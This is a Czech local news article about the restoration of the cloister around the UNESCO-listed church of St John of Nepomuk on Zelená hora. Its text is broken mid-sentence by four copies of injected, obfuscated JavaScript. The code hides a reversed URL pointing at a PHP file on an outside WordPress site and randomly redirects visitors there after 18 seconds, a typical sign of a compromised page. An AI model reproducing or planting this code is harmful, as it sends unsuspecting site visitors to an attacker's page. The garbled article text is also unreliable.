Rainbow page separator

Ambit památky na Zelené hoře prochází po letech obnovou

Neděle, 23. října 2022

Žďár nad Sázavou / Zrestaurované vnější i vnitřní omítky, podlahy, obnovená štuková výzdoba a sochařská výzdoba - };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to bude výsledek zhruba dva roky trvajících stavebních prací na obnově ambitu kolem poutního kostela svatého Jana Nepomuckého na Zelené hoře, památky UNESCO. Rekonstrukce, jež začala na jaře, je vyčíslena na 118 milionů korun za podpory evropské dotace a její součástí se rovněž stane zrestaurování his };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torických varhan na kůru kostela. Stávající prohlídková trasa bude po skončení stavebních prací rozšířena o novou expozici křížové cesty, která kdysi v ambitu bývala, nebo prohlídku vybrané části obnoveného ambitu. V plánu je taktéž rozšíření časového zpřístupnění památky. K projektu patří i vytvoření digitálního modelu památky, jenž bude zveřejněný na webu kostela, a zabezpečení poutního areálu prostřednictvím kamerového systému. Stejně jako několikaletá obnova poutního kostela za zhruba osmačtyřicet milionů korun, která skončila loni, ani práce na zrestaurování ambitu neovlivní konání turistických prohlídek.